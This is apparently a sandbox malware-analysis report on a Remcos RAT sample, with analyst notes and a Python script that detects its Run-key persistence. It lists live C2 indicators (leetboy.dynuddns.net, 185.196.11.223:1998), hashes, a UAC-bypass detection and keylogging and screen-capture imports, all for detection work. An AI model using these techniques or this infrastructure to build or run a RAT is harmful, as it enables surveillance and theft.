http://geoplugin.net/json.gp | 100% | URL Reputation | phishing
http://geoplugin.net/json.gp | 100% | URL Reputation | phishing
http://geoplugin.net/json.gp/C | 100% | URL Reputation | phishing
leetboy.dynuddns.net | 100% | Avira URL Cloud | phishing
leetboy.dynuddns.net | 9% | Virustotal |

Note: geoplugin.net is a public geolocation API, so the "phishing" verdicts on it are reputation labels attached to the URL string, not evidence that the host is attacker-controlled; the URL strings occur in both the submitted sample and the dropped copy.

Contacted domains
Name | IP | Active | Malicious | Reputation
leetboy.dynuddns.net | 185.196.11.223 | true | true | unknown

Domains (detail)
Name | Malicious | Antivirus Detection | Reputation
leetboy.dynuddns.net | true | 9% (Virustotal); Avira URL Cloud: phishing | unknown

URLs from memory and binaries
Name | Source | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp | 1m70ggeepT.exe, svcs.exe | true | URL Reputation: phishing (2x) | unknown
http://geoplugin.net/json.gp/C | 1m70ggeepT.exe, svcs.exe.0.dr | true | URL Reputation: phishing | unknown

Reputation legend: No. of IPs < 25% | 25% < No. of IPs < 50% | 50% < No. of IPs < 75% | 75% < No. of IPs

Public IPs
IP | Domain | Country | ASN | ASN Name | Malicious
185.196.11.223 | leetboy.dynuddns.net | Switzerland | 42624 | SIMPLECARRIERCH | true
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1417365
                      Start date and time:2024-03-29 05:12:07 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 1s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:8
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:1m70ggeepT.exe
                      renamed because original name is a hash value
                      Original Sample Name:06f5b8dffc6c138828adbc7f29cfc7f0.exe
                      Detection:MAL
                      Classification:mal100.rans.troj.spyw.expl.evad.winEXE@6/3@2/1
                      EGA Information:
                      • Successful, ratio: 66.7%
                      HCA Information:
                      • Successful, ratio: 97%
                      • Number of executed functions: 22
                      • Number of non-executed functions: 394
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target svcs.exe, PID 5528 because there are no executed function
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
05:12:54 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Rmc-3XK1S0 "C:\Users\user\AppData\Roaming\microsofts\svcs.exe"
05:13:02 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Rmc-3XK1S0 "C:\Users\user\AppData\Roaming\microsofts\svcs.exe"
05:13:10 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Rmc-3XK1S0 "C:\Users\user\AppData\Roaming\microsofts\svcs.exe"
05:13:26 | API Interceptor | 8101212x Sleep call for process: svcs.exe modified
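The Run-key writes above are the most durable host artefact in this report, so they are worth a detection check. The block below is an added example, not part of the Joe Sandbox report: it scores registry value-set records in the shape of Sysmon Event ID 13. The records are constructed; the first two reproduce the HKCU and HKLM writes listed above, the rest are benign controls. The value-name regex is derived from the single name this sample used (Rmc-3XK1S0) and the "user-writable profile path" heuristic is an assumption that needs tuning per environment, since legitimate software also autostarts from AppData.

```python
import re

# Constructed records in the shape of Sysmon Event ID 13 (RegistryEvent: value set).
# The first two reproduce the Run-key writes from this report; the remaining three are benign controls.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\user\Desktop\1m70ggeepT.exe",
     "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Rmc-3XK1S0",
     "Details": r'"C:\Users\user\AppData\Roaming\microsofts\svcs.exe"'},
    {"Image": r"C:\Users\user\Desktop\1m70ggeepT.exe",
     "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Rmc-3XK1S0",
     "Details": r'"C:\Users\user\AppData\Roaming\microsofts\svcs.exe"'},
    {"Image": r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
     "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
     "Details": r"C:\Windows\system32\SecurityHealthSystray.exe"},
    {"Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},
]

# Only writes directly under ...\CurrentVersion\Run are in scope; the capture group is the value name.
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\([^\\]+)$", re.IGNORECASE)
# Derived from the one value name seen in this report (Rmc-3XK1S0); treat as a sample-specific pattern, not a Remcos invariant.
RMC_NAME_RE = re.compile(r"^Rmc-[A-Z0-9]{6}$")
# Assumption: autostart targets under the user's Roaming profile or Temp deserve a second look.
PROFILE_DROP_RE = re.compile(r"^[A-Z]:\\Users\\[^\\]+\\AppData\\(Roaming|Local\\Temp)\\", re.IGNORECASE)


def image_from_details(details):
    """Extract the executable path from a Run value's data, which is either "quoted path" args or bare-path args."""
    details = details.strip()
    if details.startswith('"'):
        return details[1:].split('"', 1)[0]
    return details.split(" ", 1)[0]


def run_key_findings(events):
    """Return one finding per Run-key write that trips at least one heuristic, with the reasons spelled out."""
    findings = []
    for ev in events:
        m = RUN_KEY_RE.search(ev["TargetObject"])
        if not m:
            continue  # not a Run key value write
        value_name = m.group(1)
        image = image_from_details(ev["Details"])
        reasons = []
        if RMC_NAME_RE.match(value_name):
            reasons.append("value name follows the Rmc-<6 chars> pattern seen in this sample")
        if PROFILE_DROP_RE.match(image):
            reasons.append("autostart target lives under AppData\\Roaming or Local\\Temp")
        if reasons:
            findings.append({"hive_path": ev["TargetObject"], "value_name": value_name,
                             "image": image, "writer": ev["Image"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in run_key_findings(SAMPLE_EVENTS):
        print(f["hive_path"], "->", f["image"])
        for r in f["reasons"]:
            print("   ", r)
```

Both heuristics fire on the two malicious records and neither fires on the OneDrive or SecurityHealth controls; the OneDrive case is the one to keep in mind when widening the path heuristic to AppData\Local.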
Context of the contacted IP 185.196.11.223
Associated Sample Name | Detection | Threat Name
file.exe | malicious | AsyncRAT
Sldl84wxy8.exe | malicious | AsyncRAT, VenomRAT
V1yLpoS3XR.exe | malicious | AsyncRAT, VenomRAT
rU6YAgkoAw.exe | malicious | AsyncRAT

Context of the contacted domain leetboy.dynuddns.net
Associated Sample Name | Detection | Threat Name | Context
file.exe | malicious | AsyncRAT | 185.196.11.223
Sldl84wxy8.exe | malicious | AsyncRAT, VenomRAT | 185.196.11.223
V1yLpoS3XR.exe | malicious | AsyncRAT, VenomRAT | 185.196.11.223
rU6YAgkoAw.exe | malicious | AsyncRAT | 185.196.11.223

Context of the ASN SIMPLECARRIERCH (AS42624)
Associated Sample Name | Detection | Threat Name | Context
file.exe | malicious | AsyncRAT | 185.196.11.223
Sldl84wxy8.exe | malicious | AsyncRAT, VenomRAT | 185.196.11.223
V1yLpoS3XR.exe | malicious | AsyncRAT, VenomRAT | 185.196.11.223
rU6YAgkoAw.exe | malicious | AsyncRAT | 185.196.11.223
9NBx4Vmiuj.exe | malicious | PureLog Stealer, XWorm, zgRAT | 185.196.10.233
UNca1snvkz.elf | malicious | Mirai | 185.196.10.155
bd7kzboTUq.elf | malicious | Mirai | 185.196.10.155
H6ZdQFux3W.elf | malicious | Mirai | 185.196.10.155
jxJoK9xswU.elf | malicious | Mirai | 185.196.10.155
29oAGfUZCW.elf | malicious | Mirai | 185.196.10.155

JA3 fingerprints: No context
Dropped files: No context

Both the hostname and the IP are shared with AsyncRAT and VenomRAT samples in other submissions, and the same ASN also hosts stealer and Mirai infrastructure. Because leetboy.dynuddns.net is a dynamic-DNS name that its operator can repoint at any time, block and hunt on the IP and port pair (185.196.11.223:1998, see the network table below) as well as on the hostname.
                              Process:C:\Users\user\AppData\Roaming\microsofts\svcs.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):360
                              Entropy (8bit):7.383946551870991
                              Encrypted:false
                              SSDEEP:6:nMsZwnfQSvGc6Zyk89M8dxQnM/OITxUfwkMFKrzmqSczxPRTAl6sWEsWmssHbB1:n8nfBvY8N/OsSaRqSsUl1HsWmsKbj
                              MD5:2FAEFCC4A1C386689501A2829C110507
                              SHA1:A88B488694D5C870343F32DB7DA36A56FAE45E8D
                              SHA-256:CDAAE9CB4F9A05F0480DED928586F1A08C5CE2776D79BE23491F91B80254A78D
                              SHA-512:6C79BFA733EAF889231B0498819A20D17F721BB70CC6E77758DFB7AB73A5F63989ECC5EE263CF8EADE1786845FD69CC8C1236401A5B55B7D7A6672E5CDBFC08A
                              Malicious:false
                              Reputation:low
                              Preview:.Yu..#.|......4...).....O....&^E......m..n..GW..Ua.....i.76..#.c..4.-.......C(dv.y..z. .Y4.T....9...+..T-.n..M....Zk.lY..)..2C..b.....V..Sg......r..nrt.l..j.#.[......w...3...5.........(..2..3..C...&l...4==~I....E....`.j.b+;..k..Ft6...<e`..(u...........A.r.$...}...t....X...0_..%.c.el...L^...y..W....7..A.b"a...J.# ...{W...!.Z_+...Q.....k..k.t.'.
                              Process:C:\Users\user\Desktop\1m70ggeepT.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):494592
                              Entropy (8bit):6.599795686012734
                              Encrypted:false
                              SSDEEP:6144:aXIktXfM8Lv86r9uVWAa2je4Z5zl4hgDHQQs4NTQjoHFsAOZZDAXYcNx5Gv:aX7tPMK8ctGe4Dzl4h2QnuPs/ZDIcv
MD5:06F5B8DFFC6C138828ADBC7F29CFC7F0
SHA1:B59EF5D613A1E49C7034C3EE05780CE054CA0054
SHA-256:03BA551339062106448FF58CBC393338483439513EC8439497BF47153E13F4B7
SHA-512:E706A0B3B1981CAC8DDCF81482B306B4538FBFBF5C332F2B484F8C503B66D73CD09FFAAB0515ECB2063D1E4A27DC30A662CC0BE4F5287D2982CFBB47C7DAD893
Malicious:true
Note: these digests are identical to the submitted sample's (see the file information below), so svcs.exe is a byte-for-byte copy of 1m70ggeepT.exe placed in the Roaming profile for persistence, not an unpacked or second-stage payload; one hash set covers both.
                              Yara Hits:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, Author: unknown
                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, Author: unknown
                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, Author: ditekSHen
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: Virustotal, Detection: 79%, Browse
                              Reputation:low
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........-H..~H..~H..~.f$~[..~.f&~...~.f'~V..~A.Q~I..~.Z.~J..~...R..~...r..~...j..~A.F~Q..~H..~u..~....,..~..*~I..~....I..~RichH..~................PE..L...[1.e.................r...........I............@.......................... ..........................................................TK.......................;..@...8...........................x...@............................................text...uq.......r.................. ..`.rdata...y.......z...v..............@..@.data...D]..........................@....tls.........p......................@....gfids..0...........................@..@.rsrc...TK.......L..................@..@.reloc...;.......<...P..............@..B........................................................................................................................................................................................................
                              Process:C:\Users\user\Desktop\1m70ggeepT.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:modified
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:[ZoneTransfer]....ZoneId=0
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):6.599795686012734
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:1m70ggeepT.exe
                              File size:494'592 bytes
                              MD5:06f5b8dffc6c138828adbc7f29cfc7f0
                              SHA1:b59ef5d613a1e49c7034c3ee05780ce054ca0054
                              SHA256:03ba551339062106448ff58cbc393338483439513ec8439497bf47153e13f4b7
                              SHA512:e706a0b3b1981cac8ddcf81482b306b4538fbfbf5c332f2b484f8c503b66d73cd09ffaab0515ecb2063d1e4a27dc30a662cc0be4f5287d2982cfbb47c7dad893
                              SSDEEP:6144:aXIktXfM8Lv86r9uVWAa2je4Z5zl4hgDHQQs4NTQjoHFsAOZZDAXYcNx5Gv:aX7tPMK8ctGe4Dzl4h2QnuPs/ZDIcv
                              TLSH:B4B49E01BAD1C072D57524300D3AF776EAB8BD2028364A7B73D61D5BFE31190B62A6B7
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........-H..~H..~H..~.f$~[..~.f&~...~.f'~V..~A.Q~I..~.Z.~J..~....R..~....r..~....j..~A.F~Q..~H..~u..~....,..~..*~I..~....I..~RichH..
                              Icon Hash:95694d05214c1b33
                              Entrypoint:0x4349ef
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:TERMINAL_SERVER_AWARE
                              Time Stamp:0x65EC315B [Sat Mar 9 09:52:27 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:8d5087ff5de35c3fbb9f212b47d63cad
Instruction (disassembly at the entrypoint, 0x4349ef). The opening call/jmp pair is the MSVC CRT startup stub (security-cookie initialisation, then the jump into the common main routine); the code that follows it, with push 17h (PF_FASTFAIL_AVAILABLE) / IsProcessorFeaturePresent / int 29h and the saving of the general and segment registers into a stack-allocated CONTEXT record, is the CRT's __report_gsfailure stack-cookie handler. That is compiler boilerplate, not sample logic, so analysis should start at the function reached through the jmp.
                              call 00007FED18F6E4CCh
                              jmp 00007FED18F6DEE3h
                              push ebp
                              mov ebp, esp
                              sub esp, 00000324h
                              push ebx
                              push esi
                              push 00000017h
                              call 00007FED18F90744h
                              test eax, eax
                              je 00007FED18F6E057h
                              mov ecx, dword ptr [ebp+08h]
                              int 29h
                              xor esi, esi
                              lea eax, dword ptr [ebp-00000324h]
                              push 000002CCh
                              push esi
                              push eax
                              mov dword ptr [00471D14h], esi
                              call 00007FED18F704B7h
                              add esp, 0Ch
                              mov dword ptr [ebp-00000274h], eax
                              mov dword ptr [ebp-00000278h], ecx
                              mov dword ptr [ebp-0000027Ch], edx
                              mov dword ptr [ebp-00000280h], ebx
                              mov dword ptr [ebp-00000284h], esi
                              mov dword ptr [ebp-00000288h], edi
                              mov word ptr [ebp-0000025Ch], ss
                              mov word ptr [ebp-00000268h], cs
                              mov word ptr [ebp-0000028Ch], ds
                              mov word ptr [ebp-00000290h], es
                              mov word ptr [ebp-00000294h], fs
                              mov word ptr [ebp-00000298h], gs
                              pushfd
                              pop dword ptr [ebp-00000264h]
                              mov eax, dword ptr [ebp+04h]
                              mov dword ptr [ebp-0000026Ch], eax
                              lea eax, dword ptr [ebp+04h]
                              mov dword ptr [ebp-00000260h], eax
                              mov dword ptr [ebp-00000324h], 00010001h
                              mov eax, dword ptr [eax-04h]
                              push 00000050h
                              mov dword ptr [ebp-00000270h], eax
                              lea eax, dword ptr [ebp-58h]
                              push esi
                              push eax
                              call 00007FED18F7042Eh
                              Programming Language:
                              • [C++] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6eea8 | 0x104 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x79000 | 0x4b54 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7e000 | 0x3bcc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x6d340 | 0x38 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x6d3d4 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x6d378 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x59000 | 0x4fc | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x57175 | 0x57200 | f959ed65f49a903603bc150bbb7292aa | False | 0.571329694225251 | data | 6.62552167894442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x59000 | 0x179b6 | 0x17a00 | dd9ac1735f016f0a84955e5637da2aad | False | 0.5005580357142857 | Zebra Metafile graphic (comment = \210\002\007) | 5.859387089901195 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x71000 | 0x5d44 | 0xe00 | fa1a169b9414830def88848af87110b5 | False | 0.22154017857142858 | data | 3.00580031855032 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x77000 | 0x9 | 0x200 | 1f354d76203061bfdd5a53dae48d5435 | False | 0.033203125 | data | 0.020393135236084953 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.gfids | 0x78000 | 0x230 | 0x400 | 09e4699aa75951ab53e804fe4f9a3b6b | False | 0.3271484375 | data | 2.349075166240886 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x79000 | 0x4b54 | 0x4c00 | 2245fdef09972c13416f5a296b1f1cf4 | False | 0.2842824835526316 | data | 3.9927030586078716 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x7e000 | 0x3bcc | 0x3c00 | 0a6e61b09628beca43d4bf9604f65238 | False | 0.7639973958333334 | data | 6.718533933603825 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x7918c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.3421985815602837
RT_ICON | 0x795f4 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.27704918032786885
RT_ICON | 0x79f7c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.23686679174484052
RT_ICON | 0x7b024 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.22977178423236513
RT_RCDATA | 0x7d5cc | 0x546 | data | | | 1.0081481481481482
RT_GROUP_ICON | 0x7db14 | 0x3e | data | English | United States | 0.8064516129032258
Note: the RT_RCDATA resource (0x546 = 1350 bytes) has a ZLIB complexity above 1.0, meaning it does not compress at all, which is what encrypted or random bytes look like rather than text or structured data; it is the first resource to extract when looking for the configuration the report says it recovered.
                              DLLImport
                              KERNEL32.dllFindNextFileA, ExpandEnvironmentStringsA, GetLongPathNameW, CopyFileW, GetLocaleInfoA, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, VirtualProtect, SetLastError, VirtualFree, VirtualAlloc, GetNativeSystemInfo, HeapAlloc, GetProcessHeap, FreeLibrary, IsBadReadPtr, GetTempPathW, OpenProcess, OpenMutexA, lstrcatW, GetCurrentProcessId, GetTempFileNameW, UnmapViewOfFile, DuplicateHandle, CreateFileMappingW, MapViewOfFile, GetSystemDirectoryA, GlobalAlloc, GlobalLock, GetTickCount, GlobalUnlock, WriteProcessMemory, ResumeThread, GetThreadContext, ReadProcessMemory, CreateProcessW, SetThreadContext, LocalAlloc, GlobalFree, MulDiv, SizeofResource, QueryDosDeviceW, FindFirstVolumeW, GetConsoleScreenBufferInfo, SetConsoleTextAttribute, lstrlenW, GetStdHandle, SetFilePointer, FindResourceA, LockResource, LoadResource, LocalFree, FindVolumeClose, GetVolumePathNamesForVolumeNameW, lstrcpyW, FindFirstFileA, FormatMessageA, FindNextVolumeW, AllocConsole, lstrcmpW, GetModuleFileNameA, lstrcpynA, QueryPerformanceFrequency, QueryPerformanceCounter, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, HeapSize, WriteConsoleW, SetStdHandle, SetEnvironmentVariableW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindFirstFileExA, ReadConsoleW, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, GetTimeZoneInformation, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, HeapReAlloc, GetACP, GetModuleHandleExW, MoveFileExW, RtlUnwind, RaiseException, LoadLibraryExW, GetCPInfo, GetStringTypeW, GetLocaleInfoW, LCMapStringW, CompareStringW, TlsFree, TlsSetValue, TlsGetValue, GetFileSize, TerminateThread, GetLastError, CreateDirectoryW, GetModuleHandleA, RemoveDirectoryW, MoveFileW, SetFilePointerEx, GetLogicalDriveStringsA, DeleteFileW, DeleteFileA, 
SetFileAttributesW, GetFileAttributesW, FindClose, lstrlenA, GetDriveTypeA, FindNextFileW, GetFileSizeEx, FindFirstFileW, GetModuleHandleW, ExitProcess, CreateMutexA, GetCurrentProcess, GetProcAddress, LoadLibraryA, CreateProcessA, PeekNamedPipe, CreatePipe, TerminateProcess, ReadFile, HeapFree, HeapCreate, CreateEventA, GetLocalTime, CreateThread, SetEvent, CreateEventW, WaitForSingleObject, Sleep, GetModuleFileNameW, CloseHandle, ExitThread, CreateFileW, WriteFile, SetConsoleOutputCP, TlsAlloc, InitializeCriticalSectionAndSpinCount, MultiByteToWideChar, DecodePointer, EncodePointer, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, WaitForSingleObjectEx, ResetEvent, SetEndOfFile
                              USER32.dll: GetWindowTextW, wsprintfW, GetClipboardData, UnhookWindowsHookEx, GetForegroundWindow, ToUnicodeEx, GetKeyboardLayout, SetWindowsHookExA, CloseClipboard, OpenClipboard, GetKeyboardState, CallNextHookEx, GetKeyboardLayoutNameA, GetKeyState, GetWindowTextLengthW, GetWindowThreadProcessId, GetMessageA, SetClipboardData, EnumWindows, ExitWindowsEx, EmptyClipboard, ShowWindow, SetWindowTextW, MessageBoxW, IsWindowVisible, CloseWindow, SendInput, EnumDisplaySettingsW, mouse_event, CreatePopupMenu, DispatchMessageA, TranslateMessage, TrackPopupMenu, DefWindowProcA, CreateWindowExA, GetIconInfo, GetSystemMetrics, AppendMenuA, RegisterClassExA, GetCursorPos, SetForegroundWindow, DrawIcon, SystemParametersInfoW
                              GDI32.dll: BitBlt, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, StretchBlt, GetDIBits, DeleteObject, CreateDCA, GetObjectA, DeleteDC
                              ADVAPI32.dll: CryptAcquireContextA, CryptGenRandom, CryptReleaseContext, GetUserNameW, RegEnumKeyExA, QueryServiceStatus, CloseServiceHandle, OpenSCManagerW, OpenSCManagerA, ControlService, StartServiceW, QueryServiceConfigW, ChangeServiceConfigW, OpenServiceW, EnumServicesStatusW, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegCreateKeyA, RegCloseKey, RegQueryInfoKeyW, RegQueryValueExA, RegCreateKeyExW, RegEnumKeyExW, RegSetValueExW, RegSetValueExA, RegOpenKeyExA, RegOpenKeyExW, RegCreateKeyW, RegDeleteValueW, RegEnumValueW, RegQueryValueExW, RegDeleteKeyA
                              SHELL32.dll: ShellExecuteExA, Shell_NotifyIconA, ExtractIconA, ShellExecuteW
                              ole32.dll: CoInitializeEx, CoUninitialize, CoGetObject
                              SHLWAPI.dll: PathFileExistsW, PathFileExistsA, StrToIntA
                              WINMM.dll: waveInUnprepareHeader, waveInOpen, waveInStart, waveInAddBuffer, PlaySoundW, mciSendStringA, mciSendStringW, waveInClose, waveInStop, waveInPrepareHeader
                              WS2_32.dll: gethostbyname, send, WSAStartup, closesocket, inet_ntoa, htons, htonl, getservbyname, ntohs, getservbyport, gethostbyaddr, inet_addr, WSASetLastError, WSAGetLastError, recv, connect, socket
                              urlmon.dll: URLOpenBlockingStreamW, URLDownloadToFileW
                              gdiplus.dll: GdipSaveImageToStream, GdipGetImageEncodersSize, GdipFree, GdipDisposeImage, GdipAlloc, GdipCloneImage, GdipGetImageEncoders, GdiplusStartup, GdipLoadImageFromStream
                              WININET.dll: InternetOpenUrlW, InternetOpenW, InternetCloseHandle, InternetReadFile
                              Language of compilation system | Country where language is spoken
                              English                        | United States
                              Timestamp                          | Source Port | Dest Port | Source IP   | Dest IP
                              Mar 29, 2024 05:12:54.017630100 CET | 49704 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:12:55.019861937 CET | 49704 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:12:57.035459042 CET | 49704 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:13:01.035465956 CET | 49704 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:13:09.035430908 CET | 49704 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:13:16.052586079 CET | 49713 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:13:17.051122904 CET | 49713 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:13:19.051085949 CET | 49713 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:13:23.051068068 CET | 49713 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:13:31.051023006 CET | 49713 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:13:38.083698034 CET | 49714 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:13:39.097898006 CET | 49714 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:13:41.097934961 CET | 49714 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:13:45.113519907 CET | 49714 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:13:53.113586903 CET | 49714 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:14:00.131700039 CET | 49716 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:14:01.145840883 CET | 49716 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:14:03.285619974 CET | 49716 | 1998 | 192.168.2.5 | 185.196.11.223
